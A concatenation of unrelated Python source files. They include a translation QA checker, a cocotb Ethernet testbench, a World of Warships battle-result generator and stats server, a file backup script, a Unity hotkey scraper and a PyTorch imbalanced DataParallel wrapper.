# Results for leading spaces
if segment.leading_space_found:
print(Fore.RED + 'Leading space found.')
errors_found_overall = True
# Results for trailing spaces
if segment.trailing_space_found:
print(Fore.RED + 'Trailing space found.')
errors_found_overall = True
# Results for leading capitalization
if segment.capitalization_error_found:
print(Fore.RED + 'Leading word not capitalized.')
errors_found_overall = True
# Results for repeated words
if segment.repeated_word_found:
repeated_word_string = list_string(segment.repeated_words)
print(Fore.RED + 'Repeated words found: ' +
repeated_word_string)
errors_found_overall = True
# Results for trailing punctuation
if segment.trailing_punctuation_error:
print(Fore.RED + 'Trailing punctuation does not match.')
errors_found_overall = True
# Results for unpaired symbols
if segment.unpaired_symbol_found:
unpaired_symbol_string = list_string(segment.unpaired_symbols)
if len(segment.unpaired_symbols) > 1:
print(Fore.RED + 'Unpaired symbols found: ' +
unpaired_symbol_string)
else:
print(Fore.RED + 'Unpaired symbol found: ' +
unpaired_symbol_string)
errors_found_overall = True
# Results for missing numbers
if len(segment.missing_nums) > 0:
num_string = dict_string(segment.missing_nums)
if ',' in num_string:
print(Fore.RED + 'Missing numbers found: ' + num_string)
else:
print(Fore.RED + 'Missing number found: ' + num_string)
errors_found_overall = True
# Results for extra numbers
if len(segment.extra_nums) > 0:
num_string = dict_string(segment.extra_nums)
if ',' in num_string:
print(Fore.RED + 'Extra numbers found: ' + num_string)
else:
print(Fore.RED + 'Extra number found: ' + num_string)
errors_found_overall = True
# Results for Asian characters and symbols
if segment.asian_char_found:
asian_char_string = list_string(segment.asian_chars)
if len(segment.asian_chars) > 1:
print(Fore.RED + 'Asian characters found: ' +
asian_char_string)
else:
print(Fore.RED + 'Asian character found: ' +
asian_char_string)
errors_found_overall = True
print(Fore.CYAN + 'Source text:')
print(Fore.RESET + segment.source_text)
print(Fore.CYAN + 'Target text:')
print(Fore.RESET + segment.target_text)
print('\n')
if not errors_found_overall:
print(Fore.GREEN + '\nNo errors found.\n')
def list_string(error_list):
'''
Function for building a single string from a list.
E.g. builds a single string from all ints in the
missing_nums list of a given segment.
'''
error_string = ''
for item in error_list:
error_string = error_string + str(item) + ', '
error_string = error_string.strip(', ')
return error_string
def dict_string(error_list):
'''
Function for building a single string from a dict.
E.g. builds a single string from all keys and values in the
missing_aplhanums Counter object of a given segment.
'''
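    # Worked example (illustrative): Counter({'5': 2, '12': 1}) -> "5, 5, 12"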
error_string = ''
for item in error_list:
item_count = error_list[item]
for x in range(item_count):
error_string = error_string + str(item) + ', '
error_string = error_string.strip(', ')
return error_string
``` |
{
"source": "4Kamei/verilog_sources",
"score": 2
} |
#### File: src_test/ethernet_rx/ethernet_rx.py
```python
import cocotb
import logging
from scapy.all import Ether, ARP
from cocotb.clock import Clock
from cocotb.triggers import Event, ClockCycles
from cocotbext.eth import MiiSource, GmiiFrame, MiiPhy
IP_ADDR = "192.168.100.0"
@cocotb.test()
async def test_ethernet_rx(dut):
cocotb.fork(Clock(dut.rx_clk, 2, units="ns").start())
l = logging.getLogger("cocotb")
l.setLevel(logging.DEBUG)
dut.reset <= 1;
await ClockCycles(dut.rx_clk, 10)
dut.reset <= 0;
packet = Ether(dst="01:23:45:67:89:ab")/ARP(pdst=IP_ADDR)
bts = bytearray(packet.build())
mii_src = MiiSource(dut.rxd, None, dut.rx_dv, dut.rx_clk)
frame = GmiiFrame.from_payload(bts)
await mii_src.send(frame)
packet = Ether(dst="ff:ff:ff:ff:ff:00")/ARP(pdst=IP_ADDR)
frame2 = GmiiFrame.from_payload(bytearray(packet.build()), tx_complete=Event())
await mii_src.send(frame2)
await mii_src.wait()
await frame2.tx_complete.wait()
assert True
``` |
{
"source": "4KaNE/Discord-Lottery-Bot",
"score": 3
} |
#### File: 4KaNE/Discord-Lottery-Bot/output_battle_results.py
```python
import json
import random
# loading table
table_data = {}
try:
with open('./output_battle_table.json', 'r', encoding="utf-8_sig") as fc:
table_data = json.load(fc)
except json.JSONDecodeError as e:
print('JSONDecodeError: ', e)
exit(e)
except FileNotFoundError as e:
print('FileNotFoundError: ', e)
exit(e)
# get my tier
def get_tier(damage):
    # Extract the tier rows whose damage range contains the given damage
target_table_data = [x for x in table_data['tiers'] if int(x['min']) <= damage <= int(x['max'])]
x = random.choice(target_table_data)
my_tier = int(x['tier'])
n = random.choice([1, 2, 3])
if n == 1:
enemy_min_tier = int(x['1_min'])
enemy_max_tier = int(x['1_max'])
elif n == 2:
enemy_min_tier = int(x['2_min'])
enemy_max_tier = int(x['2_max'])
else:
enemy_min_tier = int(x['3_min'])
enemy_max_tier = int(x['3_max'])
return my_tier, enemy_min_tier, enemy_max_tier
# get my ship
def get_my_ship(tier):
ships = []
for x in table_data['ships']:
if tier == int(x['tier']):
ships.append(x['name'])
return random.choice(ships)
# get enemy ships
def get_enemy_ships(my_tier, min_tier, max_tier):
# 対象Tierの抽出
target_table_data = [x for x in table_data['ships'] if min_tier <= int(x['tier']) <= max_tier]
enemy_cv_ships_counter = 0
enemy_ships = []
loop_counter = 0
while len(enemy_ships) < 12 and loop_counter < 1000:
        loop_counter += 1  # guard against infinite loops
x = random.choice(target_table_data)
kind = x['kind']
tier = int(x['tier'])
if kind == '空母':
if enemy_cv_ships_counter > 0 or tier != my_tier:
                # For now, limit carriers to a single ship of the same tier as the player
continue
else:
enemy_cv_ships_counter += 1
enemy_ships.append(x)
return enemy_ships
class ShipDamageClass:
def __init__(self):
self.name = ''
self.hp_total = 0
self.hp_remains = 0
self.damage = 0
self.sink = ''
# get damage results
def get_damage_results(damage, enemy_ships):
remains = int(damage)
pers = list(range(1, 100))
target_ships = []
target_ships_hp_total = 0
for ship in enemy_ships:
x = ShipDamageClass()
x.name = ship['name']
x.hp_total = round(int(ship['hp']) + int(ship['hp_add']))
x.hp_remains = x.hp_total
x.damage = 0
target_ships.append(x)
target_ships_hp_total += x.hp_total
if target_ships_hp_total < remains:
return ' 敵艦全滅(' + str(target_ships_hp_total) + ')以上のダメージを叩き出しました。神かよ'
loop_counter = 0
while remains > 0 and loop_counter < 100:
        loop_counter += 1  # guard against infinite loops
x = random.choice(target_ships)
if x.hp_remains < 0:
continue
per_hp = random.choice(pers)
ship_damage = round(x.hp_total * per_hp / 100)
if x.hp_remains < ship_damage:
ship_damage = x.hp_remains
if remains < ship_damage:
ship_damage = remains
x.damage += ship_damage
x.hp_remains -= ship_damage
remains -= ship_damage
n = random.choice(pers)
if n <= 10:
# 攻撃1回につき10%の確率で撃沈
x.sink = '撃沈'
damage_ships = []
for x in target_ships:
if x.damage > 0:
s = x.name + x.sink + '(' + "{:,}".format(x.damage) + ')'
damage_ships.append(s)
return '、'.join(damage_ships)
# output_battle_results
def output_battle_results(damage):
tiers = get_tier(damage)
my_tier = tiers[0]
enemy_min_tier = tiers[1]
enemy_max_tier = tiers[2]
my_ship = get_my_ship(my_tier)
enemy_ships = get_enemy_ships(my_tier, enemy_min_tier, enemy_max_tier)
damage_result = get_damage_results(damage, enemy_ships)
result = 'あなたの使用艦艇は' + my_ship + 'で、戦果は' + damage_result + 'でした。'
return result
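# Illustrative usage sketch: a minimal way to exercise output_battle_results
# directly, assuming output_battle_table.json sits next to this script; the
# damage figure below is an arbitrary example value.
if __name__ == "__main__":
    example_damage = 150000  # hypothetical total damage dealt
    print(output_battle_results(example_damage))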
``` |
{
"source": "4KaNE/utils",
"score": 3
} |
#### File: utils/file_backupper/file_backupper.py
```python
from datetime import datetime
from math import ceil
from time import sleep
from os import mkdir
from os.path import isdir, basename, splitext
def save_file(file_path: str) -> str:
"""
Back up the specified file with rename.
Parameters
----------
file_path : str
The path of the file you want to back up.
Returns
----------
result : str
        "Success" or "failed"
"""
file_data = read_file(file_path)
    if file_data is None:
result = "failed"
return result
splited = splitext(basename(file_path))
dir_path = "./{}".format(splited[0])
if not isdir(dir_path):
mkdir(dir_path)
now = datetime.now()
save_time = now.strftime('%Y-%m-%d_%H%M')
save_file_path = "{}/{}{}{}".format(dir_path, splited[0], save_time, splited[1])
with open(save_file_path, 'w', encoding="utf-8_sig") as new_file:
new_file.write(file_data)
result = "Success"
return result
def read_file(file_path):
"""
Open the file and return the contents
Parameters
----------
file_path : str
The path of the file.
Returns
----------
file_data : str
Data in the file
"""
try:
with open(file_path, 'r', encoding="utf-8_sig") as target_file:
file_data = target_file.read()
except FileNotFoundError:
file_data = None
print('File not Found!')
return file_data
def wait_the_time() -> str:
"""
Wait for the hour.
Returns
----------
date_str : str
Time to start processing
"""
while True:
now = datetime.now()
if now.minute == 0:
break
else:
diff = (3600 - (now.minute * 60 + now.second))
interval = ceil(diff/2)
sleep(interval)
now_str = now.strftime('%Y-%m-%d %H:%M:%S')
return now_str
if __name__ == "__main__":
FILE_PATH = "path"
while True:
print(wait_the_time())
print(save_file(FILE_PATH))
sleep(60)
``` |
{
"source": "4KaNE/wows-stats-python",
"score": 3
} |
#### File: wows-stats-python/application/replayfile_monitor.py
```python
from os import path
from json import load, JSONDecodeError
class ReplayFileMonitor():
"""
    Class that monitors the replays folder
"""
def __init__(self, wows_path):
self.replays_path = path.join(wows_path, "replays")
self.arenainfo = path.join(self.replays_path, "tempArenaInfo.json")
self.flag = False
def check_arenainfo(self):
change = False
if path.exists(self.arenainfo):
if not self.flag:
self.flag = True
change = True
else:
self.flag = False
return change
def open_arenainfo(self):
try:
with open(self.arenainfo, "r", encoding="utf-8_sig") as json_file:
try:
data = load(json_file)
except JSONDecodeError:
data = None
self.flag = False
except IOError:
data = None
self.flag = False
return data
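# Illustrative usage sketch: a minimal polling loop around ReplayFileMonitor,
# assuming a World of Warships install directory; the path below is a
# placeholder and main.py is what actually drives this class.
if __name__ == "__main__":
    from time import sleep
    monitor = ReplayFileMonitor("C:/Games/World_of_Warships")  # placeholder path
    while True:
        if monitor.check_arenainfo():
            arena_info = monitor.open_arenainfo()
            if arena_info is not None:
                print(arena_info.get("mapDisplayName"))
        sleep(3)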
```
#### File: 4KaNE/wows-stats-python/main.py
```python
import os
import configparser
from datetime import datetime
from time import sleep
from json import load, dumps
from json.decoder import JSONDecodeError
import datetime
from bottle import route, run, static_file, request, Bottle, abort
from gevent.pywsgi import WSGIServer
from geventwebsocket import WebSocketError
from geventwebsocket.handler import WebSocketHandler
from tqdm import tqdm
from application import wows_api_wrapper, ships_info, wows_stats, replayfile_monitor, cp_calculator
INIFILE = configparser.SafeConfigParser()
INIFILE.read('./config/config.ini', 'UTF-8')
APP_ID = INIFILE["config"]["application_id"]
REGION = INIFILE["config"]["region"]
WOWS_PATH = INIFILE["config"]["wows_path"]
SI = ships_info.ShipInfo(APP_ID, REGION)
WAW = wows_api_wrapper.APIWrapper(APP_ID, REGION)
RFM = replayfile_monitor.ReplayFileMonitor(WOWS_PATH)
CPC = cp_calculator.CPCalculator()
APP = Bottle()
SERVER = WSGIServer(("0.0.0.0", 8080), APP, handler_class=WebSocketHandler)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
def create_data(ArenaInfo):
wst = wows_stats.WoWsStats()
pbar = tqdm(total=100, desc="Loading")
ratio = 100 // len(ArenaInfo["vehicles"])
    total = 0
for vehicle in ArenaInfo["vehicles"]:
wst.init_user_dict()
ign = vehicle["name"]
wst.add_ign(ign)
account_id = WAW.fetch_accountid(ign)
wst.add_userid(account_id)
clan_id = WAW.fetch_clan_id(account_id)
clan_tag = None if clan_id is None else WAW.fetch_clan_tag(clan_id)
wst.add_clan(clan_tag)
ship_id = vehicle["shipId"]
wst.add_ship_info(ship_id, SI.tier(ship_id), SI.name(
ship_id), SI.nation(ship_id), SI.ship_type(ship_id))
personal_data = WAW.fetch_personal_data(account_id)
ship_stats, rank_info = None if personal_data is None else WAW.fetch_ship_stats(
account_id, ship_id), WAW.fetch_rank_stats(account_id)
wst.add_personal_data(personal_data)
wst.add_ship_stats(ship_stats)
wst.add_rank(rank_info)
wst.add_combat_power(CPC.combat_power(wst.user_dict), 1)
wst.add_combat_power(CPC.personal_rating(wst.user_dict), 2)
wst.update_tmplist(vehicle["relation"])
pbar.update(ratio)
        total += ratio
wst.sort_tmplist()
data = wst.create_stats_dict(ArenaInfo["mapDisplayName"])
    rem = 100 - total
pbar.update(rem)
pbar.close()
return data
@APP.route('/static/<file_path:path>')
def static(file_path):
"""
Returning static file when accessing localhost:8080/static/
"""
return static_file(file_path, root='{}/static'.format(BASE_DIR))
@APP.route('/websocket')
def handle_websocket():
"""
WebSocket Handler
Return data once every 5 seconds
"""
websocket = request.environ.get('wsgi.websocket')
if not websocket:
abort(400, 'Expected WebSocket request.')
while True:
if not RFM.check_arenainfo():
sleep(3)
continue
arenainfo = RFM.open_arenainfo()
if arenainfo is None:
sleep(3)
continue
data = create_data(arenainfo)
try:
handler = websocket.handler
for client in handler.server.clients.values():
client.ws.send(dumps(data))
except WebSocketError:
break
@APP.route('/')
def top():
"""
Returning WebSocket client when accessing localhost:8080/
"""
return static_file('static/index.html', root='./')
SERVER.serve_forever()
``` |
{
"source": "4Kaylum/aioneo4j-v4",
"score": 3
} |
#### File: aioneo4j-v4/aioneo4j-v4/client.py
```python
import asyncio
import collections
import logging
from yarl import URL
from .transport import Transport
logger = logging.getLogger("aioneo4j.client")
class Client(object):
r"""
A Neo4j client object, used to interface with your Neo4j database.
Parameters
-----------
host: :class:`str`
The host URL that we want to connect to via HTTP.
port: :class:`int`
The port that we want to connect to the database via.
user: :class:`str`
The username we want to authenticate as.
password: :class:`str`
The password we want to authenticate our user as.
database: :class:`str`
The database you want to connect to.
transport: Optional[:class:`Transport`]
The aiohttp transport method for actually performing given requests.
request_timeout: Optional[:class:`float`]
How long a request should wait to process before timing out.
"""
def __init__(
self, host:str="127.0.0.1", port:int=7474, user:str=None, password:str=None, database:str=None, transport:Transport=Transport,
request_timeout:float=..., *, loop=None):
self.loop = loop or asyncio.get_event_loop()
url = URL(f"http://{host}:{port}")
logger.info(f"Creating a client object with url {url}")
auth = (user, password,)
self.transport = transport(
url=url,
auth=auth,
database=database,
request_timeout=request_timeout,
loop=self.loop,
)
def get_auth(self):
return self.transport.auth
def set_auth(self, auth):
self.transport.auth = auth
auth = property(get_auth, set_auth)
del get_auth, set_auth
async def cypher(self, query:str, path:str='tx/commit', request_timeout:float=..., **params):
r"""
Run a cypher on the database.
Parameters
-----------
query: :class:`str`
The query you want to run.
kwargs:
Any of the kwargs you give the cypher will be used as input variables.
"""
# If the query is a dict, we'll assume they gave the actual POST data and go from there
if isinstance(query, collections.Mapping):
assert not params
request = query
else:
request = {'statement': query}
if params:
request['parameters'] = params
request = {'statements': [request]}
logger.info(f"Sending web request to /{path} with data {request}")
_, data = await self.transport.perform_request(
'POST',
path,
data=request,
request_timeout=request_timeout,
)
return data
# async def transaction_commit(self, *statements, path='db/data/transaction/commit', request_timeout=...):
# r"""Commit a transaction"""
# # Parse out the multiple statements given
# if len(statements) == 1 and isinstance(statements[0], collections.Mapping) and 'statements' in statements[0]:
# request = statements[0]
# else:
# request = {'statements': []}
# for statement in statements:
# if not isinstance(statement, collections.Mapping):
# statement = {'statement': statement}
# else:
# if 'statement' not in statement:
# raise ValueError
# request['statements'].append(statement)
# _, data = await self.transport.perform_request(
# 'POST',
# path,
# data=request,
# request_timeout=request_timeout,
# )
# return data
# async def indexes(self, path='db/data/schema/index', request_timeout=...):
# _, data = await self.transport.perform_request(
# 'GET',
# path,
# request_timeout=request_timeout,
# )
# return data
# async def constraints(self, path='db/data/schema/constraint', request_timeout=...):
# _, data = await self.transport.perform_request(
# 'GET',
# path,
# request_timeout=request_timeout,
# )
# return data
# async def user_password(self, password, username='neo4j', path='user/{username}/password', set_auth=False, request_timeout=...):
# path = path.format(username=username,)
# request = {'password': password}
# _, data = await self.transport.perform_request(
# 'POST',
# path,
# data=request,
# request_timeout=request_timeout,
# )
# if set_auth:
# auth = username, password
# self.auth = auth
# return data
async def close(self):
await self.transport.close()
async def __aenter__(self):
return self
async def __aexit__(self, *exc_info):
await self.close()
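# Illustrative usage sketch: a minimal coroutine running one parameterised
# cypher query, assuming a local Neo4j 4.x instance and the credentials shown;
# it could be executed with asyncio.run(_example()).
async def _example():
    async with Client(host="127.0.0.1", port=7474, user="neo4j",
                      password="password", database="neo4j") as client:
        data = await client.cypher(
            "MATCH (n:Person) WHERE n.name = $name RETURN n",
            name="Alice",
        )
        print(data)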
```
#### File: aioneo4j-v4/aioneo4j-v4/transport.py
```python
import asyncio
import collections
import json
import logging
import aiohttp
import async_timeout
from aiohttp import ClientError
from . import errors
logger = logging.getLogger("aioneo4j.transport")
class Transport:
r"""
A transport object for a Neo4j client, which performs all the heavy lifting requests on the backend for the client.
Parameters
-----------
url: :class:`str`
The base URL of the database for us to connect to.
auth: :class:`tuple`
The (username, password) pair for us to authenticate with.
database: :class:`str`
The name of the database we'll be connecting to.
request_timeout: :class:`float`
The timeout to be used when performing a request.
"""
_auth = None
def __init__(self, url, auth, database, encoder=json.dumps, decoder=json.loads, encoder_errors=(TypeError, ValueError), decoder_errors=(TypeError, ValueError), request_timeout=..., session=None, maxsize=20, use_dns_cache=False, *, loop ):
self.loop = loop
self.url = url
self.database = database
self.auth = auth
self.encoder = encoder
self.decoder = decoder
self.encoder_errors = encoder_errors
self.decoder_errors = decoder_errors
self.request_timeout = request_timeout
self.session = session
if self.session is None:
self.session = aiohttp.ClientSession(
connector=aiohttp.TCPConnector(
limit=maxsize,
use_dns_cache=use_dns_cache,
loop=self.loop,
),
)
def get_auth(self):
return self._auth
def set_auth(self, auth):
if auth is not None:
if isinstance(auth, str):
username, password = auth.split(':')
elif isinstance(auth, collections.Sequence):
username, password = auth
auth = aiohttp.BasicAuth(
login=username,
password=password,
)
self._auth = auth
auth = property(get_auth, set_auth)
del get_auth, set_auth
@property
def headers(self):
return {
'Content-Type': 'application/json',
'Accept': 'application/json; charset=UTF-8',
}
async def _perform_request(self, method, url, params=None, data=None):
response = None
try:
logger.debug(f"Sending {method.upper()} {url} ({params}) with data {data}")
response = await self.session.request(
method,
url,
params=params,
data=data,
headers=self.headers,
auth=self.auth,
timeout=None,
)
text = await response.text()
if not (200 <= response.status <= 300):
extra = None
try:
extra = self.decoder(text)
except self.decoder_errors:
pass
raise errors.ClientError(response.status, extra or text)
return response.status, response.headers, text
except ClientError as exc:
logger.error(exc)
raise errors.TransportError from exc
finally:
if response is not None:
await response.release()
async def perform_request(self, method:str, path:str, params:dict=None, data:dict=None, request_timeout:float=...):
r"""Perform a web request at the database
Parameters
-----------
method: :class:`str`
The method to be used when performing the request
path: :class:`str`
The endpoint you want to ping the request to
params: :class:`dict`
The URL parameters to use
data: :class:`dict`
The JSON data to send, if any
request_timeout: :class:`float`
The timeout you want to use when performing the request
Returns
--------
The resulting data as a (status_code, headers, data) triplet
"""
# Encode the data
if data is not None:
logger.debug(f"Encoding data {data}")
if not isinstance(data, (str, bytes)):
try:
data = self.encoder(data)
except self.encoder_errors as exc:
raise errors.SerializationError from exc
if not isinstance(data, bytes):
data = data.encode('utf-8')
# Work out our URL
_url = self.url / f'db/{self.database}/{path}'
_coro = self._perform_request(method, _url, params=params, data=data)
# Work out our timeout
_request_timeout = request_timeout
if request_timeout is ...:
_request_timeout = self.request_timeout
if _request_timeout is ...:
_request_timeout = None
# Perform the request
try:
with async_timeout.timeout(_request_timeout, loop=self.loop):
status, headers, data = await _coro
except asyncio.TimeoutError:
raise errors.TimeoutError
# If we got data, let's decode that
if data:
try:
data = self.decoder(data)
except self.decoder_errors as exc:
raise errors.SerializationError from exc
# There's an error in the data? Raise that
if isinstance(data, collections.Mapping) and data.get('errors'):
raise errors.ClientError(data['errors'])
# Return the status code and the data given
return status, data
async def close(self):
await self.session.close()
``` |
{
"source": "4kelly/snipfile",
"score": 3
} |
#### File: test/unit/test_parser.py
```python
from typing import List, NamedTuple, Union
from snipfile._parser import Snippet, Token, is_a_snippet, parser, tokenize
def test_is_a_snippet():
class Case(NamedTuple):
test: str
want: bool
cases = [
Case("--8<-- filename.txt", True),
Case("--8<--", True),
# Case("\t--8<--", True),
# Case(" --8<--", True),
Case("Not a line --8<--", False),
Case("Not a line", False),
]
for case in cases:
got = is_a_snippet(case.test)
assert got == case.want
def test_tokenize():
class Case(NamedTuple):
name: str
test: str
want_items: List[str]
want_tokens: List[Token]
cases = [
Case(
"Happy Path",
"--8<-- filename.txt",
["--8<--", "filename.txt"],
[Token.SNIPPET, Token.FILEPATH],
),
Case(
"Happy Path Line Range",
"--8<-- filename.txt 1 3",
["--8<--", "filename.txt", "1", "3"],
[Token.SNIPPET, Token.FILEPATH, Token.LINENUM, Token.LINENUM],
),
Case(
"Weird Spacing",
" --8<-- filename.txt 1 3",
["--8<--", "filename.txt", "1", "3"],
[Token.SNIPPET, Token.FILEPATH, Token.LINENUM, Token.LINENUM],
),
Case(
"Happy Path Negative Line",
"--8<-- filename.txt -1",
["--8<--", "filename.txt", "-1"],
[Token.SNIPPET, Token.FILEPATH, Token.LINENUM],
),
Case(
"Filename with parent directory",
"--8<-- ../filename.txt",
["--8<--", "../filename.txt"],
[Token.SNIPPET, Token.FILEPATH],
),
Case(
"Filename with sub directory",
"--8<-- dir/filename.txt",
["--8<--", "dir/filename.txt"],
[Token.SNIPPET, Token.FILEPATH],
),
Case("Snippet Only", "--8<--", ["--8<--"], [Token.SNIPPET]),
]
for case in cases:
got_items = []
got_tokens = []
token_generator = tokenize(case.test)
for item, token in token_generator:
got_items.append(item)
got_tokens.append(token)
assert got_items == case.want_items
assert got_tokens == case.want_tokens
def test_parse_snippet():
class Case(NamedTuple):
name: str
test_items: List[Union[str, int]]
test_tokens: List[Token]
want: Snippet
cases = [
Case(
"Happy Path",
["--8<--", "filename.txt"],
[Token.SNIPPET, Token.FILEPATH],
Snippet(filepath="filename.txt"),
),
Case(
"Happy Path Line Range",
["--8<--", "filename.txt", 1, 3],
[Token.SNIPPET, Token.FILEPATH, Token.LINENUM, Token.LINENUM],
Snippet(filepath="filename.txt", startline=1, endline=3),
),
]
for case in cases:
got = parser(case.test_items, case.test_tokens)
assert got == case.want
``` |
{
"source": "4ker/ShortcutMapper",
"score": 3
} |
#### File: sources/unity3d/raw_to_intermediate.py
```python
import sys
import os
import logging
import argparse
import re
import codecs
from bs4 import BeautifulSoup
# Import common scripts
CWD = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, CWD)
sys.path.insert(0, os.path.normpath(os.path.join(CWD, '..', '..')))
# Import common shortcut mapper library
import shmaplib
log = shmaplib.setuplog(os.path.join(CWD, 'output.log'))
class RawDocsParser(object):
"""This parser scrapes shortcuts and contexts from the unity documentation html file, such as:
http://docs.unity3d.com/Manual/UnityHotkeys.html
It assumes the main relevant data is contained in a wrapper div: <div class="section">...</div>
From the contents of this div, it can extract shortcut contexts, shortcut names and keys for Windows and MacOS
"""
def __init__(self):
super(RawDocsParser, self).__init__()
self.idata = shmaplib.IntermediateShortcutData("Unity 3D")
def parse(self, source_filepath):
if not os.path.exists(source_filepath):
log.error("Source file '%s' does not exist", source_filepath)
return
# Read file contents
f = codecs.open(source_filepath, encoding='utf-8')
contents = f.read()
f.close()
# Use BeautifulSoup to parse the html document
doc = BeautifulSoup(contents)
main_wrapper_div = doc.find("div", class_="section")
tables = main_wrapper_div.find_all("table")
# Iterate sections
# - the first tr is ignored, this is actually the header
context_name = "Global Context"
for table in tables:
rows = table.tbody.find_all("tr")
for row in rows[1:]:
# The row contains 2 cols with shortcut on left, and info on right
cols = row.find_all("td")
# Skip the non-shortcut cols
if len(cols) != 2:
continue
if cols[0].em is not None:
continue
keys = cols[0].get_text()
label = cols[1].get_text()
# Split up into windows and mac shortcuts
# Example: CTRL/CMD+ALT+P
keys_win = keys
keys_mac = keys
if '/' in keys:
mods, keys = tuple(keys.split('+', 1))
mods = mods.split('/')
keys_win = mods[0] + "+" + keys
keys_mac = mods[1] + "+" + keys
self.idata.add_shortcut(context_name, label, keys_win, keys_mac)
log.debug('...found shortcut "%s"', label)
return self.idata
def main():
parser = argparse.ArgumentParser(description="Converts Unity's raw files to an intermediate format.")
parser.add_argument('-v', '--verbose', action='store_true', required=False, help="Verbose output")
parser.add_argument('-o', '--output', required=True, help="Output filepath")
    parser.add_argument('source', help="Source: HTML file containing shortcuts saved directly from Unity's online documentation (/raw folder)")
args = parser.parse_args()
args.source = os.path.abspath(args.source)
args.output = os.path.abspath(args.output)
if not os.path.exists(args.source):
print("Error: the input source file doesn't exist.")
return
# Verbosity setting on log
log.setLevel(logging.INFO)
if args.verbose:
log.setLevel(logging.DEBUG)
# Parse the docs html
docs_idata = RawDocsParser().parse(args.source)
docs_idata.serialize(args.output)
if __name__ == '__main__':
main()
``` |
{
"source": "4kssoft/unilm",
"score": 3
} |
#### File: src/nn/data_parallel.py
```python
import torch
from torch.nn import DataParallel
from torch.cuda._utils import _get_device_index
from torch.nn.parallel._functions import Scatter
from itertools import chain
def scatter_imbalance(inputs, target_gpus, dim=0):
r"""
Slices tensors into approximately equal chunks and
distributes them across given GPUs. Duplicates
references to objects that are not tensors.
"""
def scatter_map(obj):
if isinstance(obj, torch.Tensor):
if (len(target_gpus) == 4) and (obj.size(dim) == 22):
return Scatter.apply(target_gpus, (4, 6, 6, 6), dim, obj)
if (len(target_gpus) == 4) and (obj.size(dim) == 60):
return Scatter.apply(target_gpus, (12, 16, 16, 16), dim, obj)
elif (len(target_gpus) == 4) and (obj.size(dim) == 144):
return Scatter.apply(target_gpus, (24, 40, 40, 40), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 46):
return Scatter.apply(target_gpus, (4, 6, 6, 6, 6, 6, 6, 6), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 62):
return Scatter.apply(target_gpus, (6, 8, 8, 8, 8, 8, 8, 8), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 94):
return Scatter.apply(target_gpus, (10, 12, 12, 12, 12, 12, 12, 12), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 110):
return Scatter.apply(target_gpus, (12, 14, 14, 14, 14, 14, 14, 14), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 118):
return Scatter.apply(target_gpus, (13, 15, 15, 15, 15, 15, 15, 15), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 126):
return Scatter.apply(target_gpus, (14, 16, 16, 16, 16, 16, 16, 16), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 134):
return Scatter.apply(target_gpus, (15, 17, 17, 17, 17, 17, 17, 17), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 142):
return Scatter.apply(target_gpus, (16, 18, 18, 18, 18, 18, 18, 18), dim, obj)
elif (len(target_gpus) == 16) and (obj.size(dim) == 222):
return Scatter.apply(target_gpus, (12, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14), dim, obj)
return Scatter.apply(target_gpus, None, dim, obj)
if isinstance(obj, tuple) and len(obj) > 0:
return list(zip(*map(scatter_map, obj)))
if isinstance(obj, list) and len(obj) > 0:
return list(map(list, zip(*map(scatter_map, obj))))
if isinstance(obj, dict) and len(obj) > 0:
return list(map(type(obj), zip(*map(scatter_map, obj.items()))))
return [obj for targets in target_gpus]
# After scatter_map is called, a scatter_map cell will exist. This cell
# has a reference to the actual function scatter_map, which has references
# to a closure that has a reference to the scatter_map cell (because the
# fn is recursive). To avoid this reference cycle, we set the function to
# None, clearing the cell
try:
return scatter_map(inputs)
finally:
scatter_map = None
def scatter_kwargs_imbalance(inputs, kwargs, target_gpus, dim=0):
r"""Scatter with support for kwargs dictionary"""
inputs = scatter_imbalance(inputs, target_gpus, dim) if inputs else []
kwargs = scatter_imbalance(kwargs, target_gpus, dim) if kwargs else []
if len(inputs) < len(kwargs):
inputs.extend([() for _ in range(len(kwargs) - len(inputs))])
elif len(kwargs) < len(inputs):
kwargs.extend([{} for _ in range(len(inputs) - len(kwargs))])
inputs = tuple(inputs)
kwargs = tuple(kwargs)
return inputs, kwargs
class DataParallelImbalance(DataParallel):
def __init__(self, module, device_ids=None, output_device=None, dim=0):
super(DataParallelImbalance, self).__init__(
module, device_ids, output_device, dim)
if not torch.cuda.is_available():
self.module = module
self.device_ids = []
return
if device_ids is None:
device_ids = list(range(torch.cuda.device_count()))
if output_device is None:
output_device = device_ids[0]
if not all(t.is_cuda and t.device.index == device_ids[0]
for t in chain(module.parameters(), module.buffers())):
raise RuntimeError("module must have its parameters and buffers "
"on device %d (device_ids[0])" % device_ids[0])
self.dim = dim
self.module = module
self.device_ids = list(
map(lambda x: _get_device_index(x, True), device_ids))
self.output_device = _get_device_index(output_device, True)
if len(self.device_ids) == 1:
self.module.cuda(device_ids[0])
def forward(self, *inputs, **kwargs):
if not self.device_ids:
return self.module(*inputs, **kwargs)
inputs, kwargs = self.scatter_imbalance(
inputs, kwargs, self.device_ids)
if len(self.device_ids) == 1:
return self.module(*inputs[0], **kwargs[0])
replicas = self.replicate(self.module, self.device_ids[:len(inputs)])
outputs = self.parallel_apply(replicas, inputs, kwargs)
return self.gather(outputs, self.output_device)
def scatter_imbalance(self, inputs, kwargs, device_ids):
return scatter_kwargs_imbalance(inputs, kwargs, device_ids, dim=self.dim)
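# Illustrative usage sketch: wrapping a model with DataParallelImbalance,
# assuming a CUDA machine; the tiny linear model and batch size below are
# placeholders.
if __name__ == "__main__":
    import torch.nn as nn
    if torch.cuda.is_available():
        model = nn.Linear(128, 2).cuda()
        parallel_model = DataParallelImbalance(model)
        # On 4 GPUs a batch of 144 rows is split 24/40/40/40 by scatter_map above.
        logits = parallel_model(torch.randn(144, 128).cuda())
        print(logits.shape)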
```
#### File: src/pytorch_pretrained_bert/optimization.py
```python
import math
import torch
from torch.optim import Optimizer
from torch.optim.optimizer import required
from torch.nn.utils import clip_grad_norm_
from collections import defaultdict
from torch._six import container_abcs
from copy import deepcopy
